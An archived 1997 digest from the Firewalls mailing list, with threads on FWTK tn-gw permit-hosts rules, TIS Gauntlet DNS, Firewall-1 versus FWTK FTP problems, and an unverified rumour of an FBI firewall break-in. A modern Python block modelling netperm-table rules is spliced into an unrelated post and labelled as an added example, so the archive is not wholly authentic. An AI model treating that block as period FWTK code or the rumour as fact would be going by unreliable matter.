Received: from bedrock.fanniemae.com by fanniemae.com (SMI-8.6/SMI-SVR4) id JAA04671; Mon, 13 Jan 1997 09:04:37 -0500
Received: from czar.fanniemae.com by bedrock.fanniemae.com (SMI-8.6/SMI-SVR4) id JAA18576; Mon, 13 Jan 1997 09:04:36 -0500
Received: from czar by czar.fanniemae.com (SMI-8.6/SMI-SVR4) id JAA29652; Mon, 13 Jan 1997 09:04:36 -0500
Message-Id: <199701131404.JAA29652@czar.fanniemae.com>
X-Mailer: exmh version 2.0beta 12/23/96
Cc: "Gabriel Dura"
To: firewalls@GreatCircle.com
Subject: Re: FW-1 hacked? - Reply
In-Reply-To: <199701101620.IAA19160@geocities.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Date: Mon, 13 Jan 1997 09:04:35 -0500
From: Timothy L Hermans
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

This is the most ridiculous proof I have ever heard. Have you corroborated his story? How? What if I told you that there was a host called "hoover-wears-a-dress.fbi.gov". Would that be proof that I had hacked the FBI? Of course not. You'd have to hack in yourself to see.

Looks like you and this "guy" are caught up in hacker-itis (ie. the idea that hacking the FBI makes everyone think you have big cojones).
Figure out how to USE FW-1 competently and I'd be much more impressed.

On Friday, Jan 10 "Gabriel Dura" wrote:
>
> There is a guy, working on his own, who claims he knows how to penetrate
> FBI's firewall.
> As a proof I was told that behind the firewall there is another
> computer 'phi.fbi.gov'.
>
> In the case of me being correctly informed and FBI is using FW-1 you have
> an answer.
>
> Hope it helps,
> Gabriel Dura
> dura@geocities.com
>
> P.S. I can not guarantee the accuracy of this information and I can not
> reveal the person who told me.
>
> > ----------
> > From: mike
> > To: firewalls@GreatCircle.COM
> > Subject: FW-1 hacked?
> > Date: Wednesday, January 08, 1997 16:27
> >
> > Hi all
> > Does anyone know if FW-1 was ever hacked?

Tim Hermans
FannieMae/MornetPlus Unix Engineering Group

From firewalls-owner Mon Jan 13 06:59:57 1997
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id GAA28355 for firewalls-outgoing; Mon, 13 Jan 1997 06:57:31 -0800 (PST)
Received: from smartwall.v-one.com (smartwall.v-one.com [206.205.89.11]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id GAA28337 for ; Mon, 13 Jan 1997 06:57:19 -0800 (PST)
Received: by smartwall.v-one.com; id JAA09628; Mon, 13 Jan 1997 09:57:07 -0500 (EST)
Received: from securemail.v-one.com(10.6.0.6) by smartwall.v-one.com via smap (V3.1.1) id xma009622; Mon, 13 Jan 97 09:57:03 -0500
Received: (from csample@localhost) by securemail.v-one.com (8.7.4/8.7.3) id KAA15429; Mon, 13 Jan 1997 10:06:26 -0500 (EST)
Date: Mon, 13 Jan 1997 10:06:25 -0500 (EST)
From: char
To: Jung Jun Lee
cc: GreatCircle
Subject: Re: How can I configure hidden DNS on TIS?
In-Reply-To: <199701131209.VAA24418@kexin.kexin.co.kr>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

On Mon, 13 Jan 1997, Jung Jun Lee wrote:

> Hi..
> If I configure TIS to primary DNS, can I use internal DNS for hidden?
>
> Thanks
>

Of course this is a TIS customer support question... but you will need to build an internal primary DNS on another machine... the internal primary NS will slave forward to the Gauntlet. The Gauntlet has minimal names on it; point Gauntlet's /etc/resolv.conf to the internal nameserver.

char

+---------------------------------------------------------------------------+
char sample /* that really is my name */
e-mail: char@v-one.com
+---------------------------------------------------------------------------+

From firewalls-owner Mon Jan 13 07:14:46 1997
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id GAA27475 for firewalls-outgoing; Mon, 13 Jan 1997 06:46:42 -0800 (PST)
Received: from sunphil.sunphil.mozcom.com (sunphil.mozcom.com [206.151.138.34]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id GAA27426 for ; Mon, 13 Jan 1997 06:46:15 -0800 (PST)
Received: by sunphil.sunphil.mozcom.com (SMI-8.6/SMI-SVR4) id WAA21602; Mon, 13 Jan 1997 22:44:57 -0800
Date: Mon, 13 Jan 1997 22:44:57 -0800
From: drexx@sunphil.mozcom.com (Dexter D. Laggui)
Message-Id: <199701140644.WAA21602@sunphil.sunphil.mozcom.com>
To: firewalls@greatcircle.com, fw-1-mailinglist@us.checkpoint.com
Subject: TIS FWTK and Solstice FW-1 arguing
X-Sun-Charset: US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Hello world, Jan. 13, 1996 (10:45pm Manila time)

This is a case where the original Sys Admin who set up the old TIS Firewall Toolkit needs to be around. You see, with the following setup:

+-------------+--[interior Cisco 2500]--[Solstice Firewall-1]-->Internet
|             |
Windows      TIS
clients      FWTK
             proxy & DNS server

The TIS FWTK is configured as a telnet, mail, and ftp proxy server and also as the DNS server. It runs on a PC with FreeBSD. And managing it is like paying up one's dues in hell. (I know, the server design sucks...)
With the Firewall-1 installed, we had a rule saying that FTP is allowed from anywhere to anywhere. But with the TIS FWTK having its say in the matter, we can't get FTP services! We can only have FTP services if we bypass the FTP proxy.

Please advise me on how to even start making the two boxes work. Please?

Most humble newbie,
Drexx.

"It's a dirty job, but somebody's gotta do it." -- John Wayne
~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~
 ______
/_____/\         DEXTER D. LAGGUI
/_____\\ \       Systems Engineer, Systems Integration Division
/_____\ \\ /     PHILIPPINE SYSTEMS PRODUCTS INC.
/_____/ \/ / /   Penthouse, Corporate Business Center
/_____/ / \//\   150 Paseo de Roxas Ave., Legaspi Village
\_____\//\ / /   Makati City, Philippines
\_____/ / /\ /
\_____/ \\ \     Phone: (++632) 813-6453 to 55 loc. 222
\_____\ \\       Fax:   (++632) 813-3516
\_____\/         Email: drexx@sunphil.mozcom.com
~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~

From firewalls-owner Mon Jan 13 07:45:10 1997
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id HAA02988 for firewalls-outgoing; Mon, 13 Jan 1997 07:41:53 -0800 (PST)
Received: from mx.globalsrv.com (mx.globalsrv.com [207.17.80.5]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id HAA02980 for ; Mon, 13 Jan 1997 07:41:45 -0800 (PST)
Received: (qmail 32429 invoked from smtpd); 13 Jan 1997 16:41:48 -0000
Received: from pineal.encephalon.com (208.199.232.82) by mx.globalsrv.com with SMTP; 13 Jan 1997 16:41:48 -0000
Message-ID: <32DA57DA.2781@encephalon.com>
Date: Mon, 13 Jan 1997 09:42:18 -0600
From: Joel Colvin
Organization: Colvin Training & Consulting
X-Mailer: Mozilla 3.01Gold (X11; I; SCO_SV 3.2 i386)
MIME-Version: 1.0
To: char
CC: Firewalls Mailing List
Subject: Re: tn-gw problems
References:
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

I'm going from inside the firewall out to the internet. Currently I am using the following line to only allow tests from the firewall, but I get the same result when I add an appropriate IP address from inside and try from that host.

tn-gw: permit-hosts 127.0.0.1

This is what I get when I try:

$ telnet localhost
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
pineal.encephalon.com telnet proxy (Version V2.0beta) ready:
tn-gw-> Connection closed by foreign host.

I have also tried without using netacl and manually starting tn-gw, with the same result. It sure feels like a config problem, but I am at a loss for what's wrong.

--
Joel

char wrote:
>
> You failed to mention are you going from out to in or in to out
>
> If you are going in to out remember to enter the line
> tn-gw: permit-hosts xxx.xxx.xxx.xxx
> (where xxx.xxx.xxx.xxx is the internal host you are allowing through)
>
> If the host is out to in:
>
> tn-gw: permit-hosts yyy.yyy.yyy.yyyy -auth
>
> If you are still having problems let me know...
>
> char
>
> +---------------------------------------------------------------------------+
> char sample /* that really is my name */
> e-mail: char@v-one.com
> +---------------------------------------------------------------------------+

From firewalls-owner Mon Jan 13 07:59:51 1997
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id HAA03490 for firewalls-outgoing; Mon, 13 Jan 1997 07:47:07 -0800 (PST)
Received: from wormhole.tds.de (wormhole.tds.de [193.28.100.9]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id HAA03460 for ; Mon, 13 Jan 1997 07:46:52 -0800 (PST)
Received: (from uucp@localhost) by wormhole.tds.de (8.8.0/8.6.9) id QAA03528 for ; Mon, 13 Jan 1997 16:43:16 +0100
Received: from nv6000x.hn.tds.de(193.28.102.69) by wormhole.hn.tds.de via smap (V2.0beta) id xma003522; Mon, 13 Jan 97 16:43:03 +0100
Message-ID: <32DA57A2.15FB@dat.tds.de>
Date: Mon, 13 Jan 1997 16:41:22 +0100
From: Christopher Tighe
Organization: Tele-Daten Service GmbH
X-Mailer: Mozilla 3.01 (X11; I; AIX 2)
MIME-Version: 1.0
To: firewalls@greatcircle.com
Subject: tcp port 5510
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Hi,

does anyone know what tcp port 5510 is used for, or where I can find it out? It is not listed in rfc 1700.

cheers
chris
--
+------------------------------------------------------------+
| Christopher Tighe BSc. CCIE.   Tel: ++49 (0)7131 6235-119  |
| Network Services               Fax: ++49 (0)7131 6235-115  |
| tele-daten service GmbH        E-Mail: ctighe@tds.de       |
| Titotstr. 7-9                                              |
| 74072 Heilbronn                                   \"""/    |
| Germany                                           (o o)    |
+------------------------------------.ooO(_)Ooo.-------------+

From firewalls-owner Mon Jan 13 08:14:49 1997
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id IAA05418 for firewalls-outgoing; Mon, 13 Jan 1997 08:10:16 -0800 (PST)
Received: from smartwall.v-one.com (smartwall.v-one.com [206.205.89.11]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id IAA05394 for ; Mon, 13 Jan 1997 08:09:56 -0800 (PST)
Received: by smartwall.v-one.com; id LAA11141; Mon, 13 Jan 1997 11:09:40 -0500 (EST)
Received: from securemail.v-one.com(10.6.0.6) by smartwall.v-one.com via smap (V3.1.1) id xma011131; Mon, 13 Jan 97 11:09:17 -0500
Received: (from csample@localhost) by securemail.v-one.com (8.7.4/8.7.3) id LAA15902; Mon, 13 Jan 1997 11:18:41 -0500 (EST)
Date: Mon, 13 Jan 1997 11:18:39 -0500 (EST)
From: char
To: Joel Colvin
cc: Firewalls Mailing List
Subject: Re: tn-gw problems
In-Reply-To: <32DA57DA.2781@encephalon.com>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

On Mon, 13 Jan 1997, Joel Colvin wrote:

> I'm going from inside the firewall out to the internet.
> Currently I am using the following line to only allow tests from the
> firewall but I get the same result when I add an appropriate IP address
> from inside and try from that host.
>
> tn-gw: permit-hosts 127.0.0.1
>
> This is what I get when I try:
>
> $ telnet localhost
> Trying 127.0.0.1...
> Connected to localhost.
> Escape character is '^]'.
> pineal.encephalon.com telnet proxy (Version V2.0beta) ready:
> tn-gw-> Connection closed by foreign host.
>
> I have also tried without using netacl and manual starting tn-gw with
> the same result. It sure feels like a config problem but I am at a loss
> for what's wrong.

Indeed this does sound like a config problem... anything meaningful in your syslog files? Are you running the tn-gw out of rc.local or /etc/inetd.conf? If so, any chance that you could relay the info? If you are running out of rc.local, does it indicate the path /usr/local/etc/netacl?

What you really want to do here is have the TCP wrapper running, then specify within the confines of the netacl which proxy you intend on running.

Also, a side note... in some versions of fwtk, for trusted hosts you will need to specify

tn-gw: permit-hosts xxx.xxx.xxx.xxx -unauth

Don't know if any of this helps...
let me know please

char

+---------------------------------------------------------------------------+
char sample /* that really is my name */
e-mail: char@v-one.com
+---------------------------------------------------------------------------+

From firewalls-owner Mon Jan 13 09:14:19 1997
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id IAA10297 for firewalls-outgoing; Mon, 13 Jan 1997 08:52:47 -0800 (PST)
Received: from mail.dserve.net ([207.108.135.5]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id IAA10290 for ; Mon, 13 Jan 1997 08:52:38 -0800 (PST)
Received: from mail ([207.115.134.169]) by mail.dserve.net (Netscape Mail Server v2.02) with ESMTP id AAA218 for ; Mon, 13 Jan 1997 09:49:28 -0700
Message-ID: <32DA4AF7.6EED@dserve.net>
Date: Mon, 13 Jan 1997 06:47:19 -0800
From: "Eric C. Rodziewicz"
X-Sender: "Eric C. Rodziewicz"
X-Mailer: Mozilla 4.0b1 (WinNT; I)
MIME-Version: 1.0
To: firewalls@greatcircle.com
Subject: ON Tech's FW
X-Priority: Normal
Content-Type: multipart/alternative; boundary="----------6F4AA3212164"
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Any comments on this FW.
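For the tn-gw thread above (Joel's symptom and char's reply), an added example that is not FWTK code and not from any poster: a small Python model of how the two stages char describes, netacl launched from inetd and then tn-gw itself, consult permit-hosts and deny-hosts lines in a netperm-table, so that one can see for a given client address whether the proxy would serve it at all and whether it would demand authentication. The table is constructed from the lines quoted in the thread plus a netacl-in.telnetd rule with the -exec flag FWTK's netacl uses; first-match-wins ordering and plain glob matching of the '*' wildcard are assumptions of this model, not a description of FWTK's parser. The address 198.51.100.7 is a constructed outside host.

```python
"""Evaluate FWTK-style netperm-table permit-hosts/deny-hosts rules.

Added example, not FWTK's own code: a simplified model of how netacl and
tn-gw consult the netperm-table, used to check which clients the two-stage
telnet proxy setup discussed in this thread would let through.
"""
from fnmatch import fnmatchcase

# Constructed netperm-table, modelled on the lines quoted in the thread.
# Stage 1: netacl (run from inetd) decides whether to exec tn-gw at all.
# Stage 2: tn-gw decides whether it serves the client and how.
# Rules are matched in file order here, so the deny-hosts line must come
# before the wildcard permit it carves an exception out of.
SAMPLE_NETPERM_TABLE = """\
# stage 1: who may reach the telnet proxy through netacl
netacl-in.telnetd: permit-hosts 127.0.0.1 -exec /usr/local/etc/tn-gw
netacl-in.telnetd: permit-hosts 192.168.1.* -exec /usr/local/etc/tn-gw
netacl-in.telnetd: permit-hosts 198.51.100.7 -exec /usr/local/etc/tn-gw
# stage 2: who the proxy itself will serve
tn-gw: permit-hosts 127.0.0.1
tn-gw: deny-hosts 192.168.1.250
tn-gw: permit-hosts 192.168.1.* -unauth
tn-gw: permit-hosts 198.51.100.7 -auth
"""

def parse_netperm(text):
    """Return (app, action, patterns, flags) tuples in file order.

    A rule line reads 'app: permit-hosts pat [pat ...] [-flag [arg] ...]';
    everything from the first '-' token onwards is treated as flags.
    Comments and keywords other than permit-hosts/deny-hosts are skipped.
    """
    rules = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        app, sep, rest = line.partition(":")
        tokens = rest.split()
        if not sep or len(tokens) < 2 or tokens[0] not in ("permit-hosts", "deny-hosts"):
            continue
        patterns, flags = [], []
        for tok in tokens[1:]:
            if flags or tok.startswith("-"):
                flags.append(tok)
            else:
                patterns.append(tok)
        rules.append((app.strip(), tokens[0], patterns, flags))
    return rules

def lookup(rules, app, client_ip):
    """First rule for `app` whose pattern matches wins (ordering assumed here).

    '*' is a plain glob in this model, so '192.168.1.*' would also match
    192.168.10.7; a real table needs patterns as tight as the policy.
    Returns (permitted, flags); (False, []) when nothing matches, which is
    what a host missing from the table gets: a closed connection.
    """
    for rule_app, action, patterns, flags in rules:
        if rule_app == app and any(fnmatchcase(client_ip, p) for p in patterns):
            return action == "permit-hosts", flags
    return False, []

def telnet_proxy_decision(table_text, client_ip):
    """Combine both stages for one client address."""
    rules = parse_netperm(table_text)
    ok, netacl_flags = lookup(rules, "netacl-in.telnetd", client_ip)
    if not ok or "-exec" not in netacl_flags:
        return "refused by netacl: no matching permit-hosts ... -exec rule"
    ok, gw_flags = lookup(rules, "tn-gw", client_ip)
    if not ok:
        return "tn-gw closes the connection: no matching permit-hosts rule"
    if "-auth" in gw_flags:
        return "permitted, authentication required"
    return "permitted without authentication"

if __name__ == "__main__":
    for ip in ("127.0.0.1", "192.168.1.7", "192.168.1.250", "198.51.100.7", "10.9.8.7"):
        print(f"{ip:15} {telnet_proxy_decision(SAMPLE_NETPERM_TABLE, ip)}")
```

The point of the two-stage check is char's: a host can be permitted in the tn-gw rules and still be turned away because no netacl rule hands it to the proxy, and vice versa, so when a client sees the banner and then an immediate close, both sets of lines (and syslog) need to be read together.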
From firewalls-owner Mon Jan 13 09:15:05 1997
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id IAA07457 for firewalls-outgoing; Mon, 13 Jan 1997 08:31:15 -0800 (PST)
Received: from cheops.anu.edu.au (cheops.anu.edu.au [150.203.76.24]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id IAA07309 for ; Mon, 13 Jan 1997 08:30:32 -0800 (PST)
Message-Id: <199701131630.IAA07309@miles.greatcircle.com>
Received: by cheops.anu.edu.au (1.37.109.16/16.2) id AA005172965; Tue, 14 Jan 1997 03:29:26 +1100
From: Darren Reed
Subject: Re: TIS FWTK and Solstice FW-1 arguing
To: drexx@sunphil.mozcom.com (Dexter D. Laggui)
Date: Tue, 14 Jan 1997 03:29:25 +1100 (EDT)
Cc: firewalls@GreatCircle.COM, fw-1-mailinglist@us.checkpoint.com
In-Reply-To: <199701140644.WAA21602@sunphil.sunphil.mozcom.com> from "Dexter D. Laggui" at Jan 13, 97 10:44:57 pm
X-Mailer: ELM [version 2.4 PL23]
Content-Type: text
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

In some mail from Dexter D. Laggui, sie said:
>
> Hello world, Jan. 13, 1996 (10:45pm Manila time)
>
> This is a case where the original Sys Admin who set up the old TIS
> Firewall Toolkit needs to be around. You see, with the following setup:
>
> +-------------+--[interior Cisco 2500]--[Solstice Firewall-1]-->Internet
> |             |
> Windows      TIS
> clients      FWTK
>              proxy & DNS server
>
> The TIS FWTK is configured as a telnet, mail, and ftp proxy server and
> also as the DNS server. It runs on a PC with FreeBSD. And managing it is
> like paying up one's dues in hell. (I know, the server design sucks...)
>
> With the Firewall-1 installed, we had a rule saying that FTP is allowed
> from anywhere to anywhere. But with the TIS FWTK having its say in the
> matter, we can't get FTP services! We can only have FTP services if we
> bypass the FTP proxy.
>
> Please advise me on how to even start making the two boxes work. Please?

This is a FW-1 bug.
A patch from Checkpoint should be available. Or you might hack ftp-gw to work around the FW-1 bug.

Darren

From firewalls-owner Mon Jan 13 09:29:44 1997
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id IAA07936 for firewalls-outgoing; Mon, 13 Jan 1997 08:35:11 -0800 (PST)
Received: from marsi. (mars.mediaone.net [207.120.78.115]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id IAA07920 for ; Mon, 13 Jan 1997 08:35:01 -0800 (PST)
Received: from northstar.mediaone.com by marsi. (SMI-8.6/SMI-SVR4) id LAA01247; Mon, 13 Jan 1997 11:33:48 -0500
Received: from mahimahi ([10.1.2.212]) by northstar.mediaone.com (Netscape Mail Server v1.1) with ESMTP id AAA109 for ; Mon, 13 Jan 1997 11:35:48 -0500
Message-ID: <32DA63EE.78C6@mediaone.net>
Date: Mon, 13 Jan 1997 11:33:50 -0500
From: epimntl@mediaone.net (Ed Pimentel)
Reply-To: epimntl@mediaone.net
Organization: MediaOne
X-Sender: Ed Pimentel
X-Mailer: Mozilla 4.0b1 (WinNT; I)
MIME-Version: 1.0
To: firewalls-digest@GreatCircle.COM
Subject: What is the percentage of Internet Service Providers that use an external firewall?
X-Priority: Normal
Content-Type: multipart/alternative; boundary="----------7AFB6A0836153"
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Are there any public figures that show the percentage of ISPs that use external firewalls? Most everyone uses firewalls to guard their internal LAN; however, some ISPs believe that external firewalls may not be necessary.
From firewalls-owner Mon Jan 13 09:46:37 1997
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id IAA06748 for firewalls-outgoing; Mon, 13 Jan 1997 08:26:00 -0800 (PST)
Received: from Walden.MO.NET (walden.mo.net [199.250.196.5]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id IAA06709 for ; Mon, 13 Jan 1997 08:25:45 -0800 (PST)
Received: from gate.hussmann.com (gate.hussmann.com [205.139.246.2]) by Walden.MO.NET (8.8.3/8.6.10) with ESMTP id KAA29663; Mon, 13 Jan 1997 10:35:30 -0600 (CST)
Received: (from nobody@localhost) by gate.hussmann.com (8.7.1/8.7.3) id KAA29368; Mon, 13 Jan 1997 10:25:04 -0600
Message-Id: <199701131625.KAA29368@gate.hussmann.com>
Received: from mail-gate.hussmann.com(129.1.5.4) by gate.hussmann.com via smap (V1.3) id tmp029359; Mon Jan 13 10:24:56 1997
Date: Mon, 13 Jan 1997 10:24:00 -0600
From: "Hicks, Rick"
Subject: RE: LINUX RedHat
To: "'Firewalls List'"
Cc: "'jmperez@sprynet.com'"
X-Mailer: Worldtalk (NetConnex V4.00a)/MIME
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

>I would appreciate hearing from anyone who has successfully installed a
>PC-based
>firewall in a LINUX RedHat environment. We have adopted LINUX RedHat for our
>company and would prefer the TIS FW Toolkit or some other similar product,
>although I know BSD OS is recommended most often. I recall reading an EMAIL
>message on this forum sometime back about a person who charges $2,000 to
>install
>TIS FW Toolkit. Perhaps that person has had some experience with RedHat and
>would like to share his/her knowledge as to what FW would best configure with
>LINUX RedHat.

I have been running a 'firewall' on Linux (RedHat) for almost a year now without any problems. I used parts of the TIS kit and other things: caching proxy, Real Audio proxy, scan detectors, Tripwire, etc. However, I don't think the issue is whether I can run this correctly; it's whether YOU can run this correctly.
To be using the TIS toolkit you should know how to compile and configure programs yourself, and know about Internet security issues and how each piece of the firewall handles them. The kit was not intended, and is licensed accordingly, to be installed by people for money; it is intended to be a kit for security professionals to use and improve upon. If you feel comfortable with your security knowledge and compiling and configuring programs, then give the kit a try. If you are looking for someone to set up a firewall for you, you will need to purchase a commercial firewall.

Rick
____________________________________________
Rick Hicks
Network Specialist
Hussmann Corporation
RHicks@Hussmann.com
http://www.hussmann.com

From firewalls-owner Mon Jan 13 09:50:37 1997
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id IAA06788 for firewalls-outgoing; Mon, 13 Jan 1997 08:26:37 -0800 (PST)
Received: from smartwall.v-one.com (smartwall.v-one.com [206.205.89.11]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id IAA06772 for ; Mon, 13 Jan 1997 08:26:22 -0800 (PST)
Received: by smartwall.v-one.com; id LAA11440; Mon, 13 Jan 1997 11:26:10 -0500 (EST)
Received: from nt_fs1.v-one.com(198.69.135.3) by smartwall.v-one.com via smap (V3.1.1) id xma011420; Mon, 13 Jan 97 11:25:56 -0500
Received: by nt_fs1.V-ONE.COM with SMTP (Microsoft Exchange Server Internet Mail Connector Version 4.0.994.63) id <01BC0144.D28AD8D0@nt_fs1.V-ONE.COM>; Mon, 13 Jan 1997 11:27:56 -0500
Message-ID:
From: "Rowland, Craig H"
To: "'rammeri@winternet.co.at'" , "'armin'"
Cc: "'firewalls@GreatCircle.COM'"
Subject: RE: Secure firewall with only Linux-Kernel filtering possible?
Date: Mon, 13 Jan 1997 11:27:55 -0500
X-Mailer: Microsoft Exchange Server Internet Mail Connector Version 4.0.994.63
MIME-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Content-Transfer-Encoding: 7bit
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

>----------
>From: armin[SMTP:armin@data.tops.net]
>Sent: Saturday, January 13, 1996 8:56 AM
>To: rammeri@winternet.co.at
>Cc: firewalls@GreatCircle.COM
>Subject: Re: Secure firewall with only Linux-Kernel filtering possible?
>
>
>additionally:
> ...
>
>- sit down a minute and think 'bout sendmail =:)
>  (dont use < 8.8.4 )
   ^^^^^^^^^

Well I agree with the first half :) I'd also set the firewall up to handle the incoming mail with SMAP as a front end. You can obtain the program from www.tis.com as part of the Firewall Tool Kit.

>best regards
>-armin
>
>>
>> Assume the following situation:
>>
>> We are a company with 25 computer systems in a LAN, and with a 64k
>> connection
>> to the internet.
>>
>> So ... my question is ... is the following security-schema good or why
>> not?
>>
>> Our LAN is divided into several parts, so we use 192.168.0.0 -
>> 192.168.4.0
>> for our internet network.
>> Between the router to the internet and the first local router, we have
>> a firewall-setup with only the linux-kernel-filtering/masquerading.
>> The firewall
>> allows any connections to be made from the internal-net. But
>> disallows any connection but a port 25 that will be forwarded to our
>> mail-host in the internal net (even this connection is limited to our
>> MX host).
>> The firewall disallows incoming ftp-data.
>> On the firewall there is NO daemon running, not even telnet for
>> administration
>> or sth. like this.
>> ...
>> Ok .. so tell me please, why is this setup insecure?
>>
>> thx,
>> ingo
>> --

Craig

From firewalls-owner Mon Jan 13 11:13:52 1997
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id KAA17459 for firewalls-outgoing; Mon, 13 Jan 1997 10:31:51 -0800 (PST)
Received: from palrel1.hp.com (palrel1.hp.com [15.253.72.10]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id KAA17430 for ; Mon, 13 Jan 1997 10:31:34 -0800 (PST)
Received: from borg.mayfield.hp.com (borg.mayfield.hp.com [15.13.216.4]) by palrel1.hp.com with ESMTP (8.7.5/8.7.3) id KAA17088 for ; Mon, 13 Jan 1997 10:31:24 -0800 (PST)
Message-Id: <199701131831.KAA17088@palrel1.hp.com>
Received: by borg.mayfield.hp.com (1.39.111.2/16.2) id AA019559705; Mon, 13 Jan 1997 10:21:45 -0800
From: Frank Beall
Subject: lab tests
To: firewalls@GreatCircle.COM
Date: Mon, 13 Jan 1997 10:21:45 PST
X-Mailer: Elm [revision: 112.2]
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

If you're evaluating firewalls, check this article out from Data Communications.
http://www.data.com/Lab_Tests/Firewalls.html

From firewalls-owner Mon Jan 13 11:20:51 1997
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id KAA19365 for firewalls-outgoing; Mon, 13 Jan 1997 10:50:53 -0800 (PST)
Received: from sfs01.winternet.co.at ([194.118.33.10]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id KAA19257 for ; Mon, 13 Jan 1997 10:50:08 -0800 (PST)
Received: from WINTERMUTE [194.118.13.135] (HELO winternet.co.at) by sfs01.winternet.co.at (AltaVista Mail V1.0/1.0 BL18 listener) id 0000_005e_32da_848a_9ffe; Mon, 13 Jan 1997 19:52:58 +0100
Received: from wintermute.w-inet.at (localhost [127.0.0.1]) by winternet.co.at (8.7.6/8.7.3) with ESMTP id CAA06124; Tue, 14 Jan 1997 02:47:05 +0100
Message-Id: <199701140147.CAA06124@winternet.co.at>
X-Mailer: exmh version 2.0beta 12/23/96
Reply-to: rammeri@winternet.co.at
X-IRCNick: KPanic
X-IRCNet: EF-Net
To: armin
cc: rammeri@winternet.co.at, firewalls@GreatCircle.COM
Subject: Re: Secure firewall with only Linux-Kernel filtering possible?
In-reply-to: Your message of "Sat, 13 Jan 1996 14:56:51 +0100."
Mime-Version: 1.0
Content-Type: text/plain; charset=iso-8859-1
Date: Tue, 14 Jan 1997 02:47:05 +0100
From: Ingo Rammer
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

At first I want to say a nice little thank you to the ones who answered my questions. But there's still a little question running around in the depths of my brain .. that's .. what are the advantages of, say, AltaVista Firewall or FW-1 compared to a Linux box ... as I know the I/O system of a Sun, f.e., is worse than Linux's .... so .... is it because of

*) greater security?
*) greater flexibility?
*) graphic setup?
*) throughput?
*) having someone to blame, if it doesn't work?
> - sit down a minute and think 'bout sendmail =:)
>   (dont use < 8.8.4 )

We use an NT box for mail-handling, with AltaVista Mail Server because some guys here really need some bells-and-whistles graphics for user setup :( but anyway .. I hope it is fairly secure ,)

thx,
ingo
--
----------------------------------------------------------------------
No need to turn out the light  | Email: rammeri@winternet.co.at
you feel so depressed inside   | SMS: +436643552547@text.mobilkom.at
when you think of all your     | Phone: +43-664-3552547
wasted years at night          |        +43-7253-7697
----------------------------------------------------------------------

From firewalls-owner Mon Jan 13 11:30:13 1997
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id LAA20657 for firewalls-outgoing; Mon, 13 Jan 1997 11:08:37 -0800 (PST)
Received: from halon.sybase.com (halon.sybase.com [192.138.151.33]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id LAA20619 for ; Mon, 13 Jan 1997 11:08:11 -0800 (PST)
Received: from smtp1.sybase.com (sybgate.sybase.com [130.214.220.35]) by halon.sybase.com (8.8.4/8.8.4) with SMTP id LAA26545 for ; Mon, 13 Jan 1997 11:10:05 -0800 (PST)
Received: from notesgw2.sybase.com by smtp1.sybase.com (4.1/SMI-4.1/SybH3.5-030896) id AA07524; Mon, 13 Jan 97 11:07:45 PST
Received: (from unixsvr1@localhost) by notesgw2.sybase.com (8.8.4/8.8.4) id LAA00453 for @sybgate.sybase.com:firewalls@GreatCircle.COM; Mon, 13 Jan 1997 11:07:32 -0800 (PST)
Message-Id: <199701131907.LAA00453@notesgw2.sybase.com>
